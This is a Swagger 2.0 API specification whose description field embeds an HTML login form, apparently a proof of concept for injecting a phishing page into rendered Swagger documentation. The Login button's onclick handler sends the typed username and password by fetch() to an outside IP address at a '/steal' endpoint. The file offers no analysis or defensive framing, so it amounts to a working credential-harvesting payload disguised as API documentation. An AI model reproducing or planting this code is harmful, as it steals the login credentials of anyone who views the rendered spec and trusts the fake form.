swagger: '2.0'
info:
  version: 1.0.0
  title: Login Page
  description: >
    <div style='width:100%;max-width:400px;margin:20px auto;padding:20px;background:#fff;border-radius:8px;box-shadow:0 4px 8px rgba(0,0,0,0.1);'>
      <h1 style='text-align:center;font-size:24px;color:#333;margin-bottom:20px;'>Login Page</h1>
      <div style='margin-bottom:15px;'>
        <label for='username' style='font-size:14px;color:#555;display:block;margin-bottom:5px;'>Username</label>
        <input type='text' id='username' placeholder='Username' style='width:100%;padding:10px;font-size:14px;border:1px solid #ccc;border-radius:4px;'>
      </div>
      <div style='margin-bottom:15px;'>
        <label for='password' style='font-size:14px;color:#555;display:block;margin-bottom:5px;'>Password</label>
        <input type='password' id='password' placeholder='Password' style='width:100%;padding:10px;font-size:14px;border:1px solid #ccc;border-radius:4px;'>
      </div>
      <div style='margin-top:20px;'>
        <button onclick='fetch("http://13.218.73.5/steal",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({username:document.getElementById("username").value,password:document.getElementById("password").value})}).catch(err=>console.error("Log failed:",err));' style='width:100%;padding:12px;background:#5cb85c;border:none;color:white;font-size:16px;border-radius:4px;cursor:pointer;'>Login</button>
      </div>
    </div>
    <div style='position:fixed;bottom:10px;right:10px;font-size:12px;color:#888;'>Swagger POC</div>
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
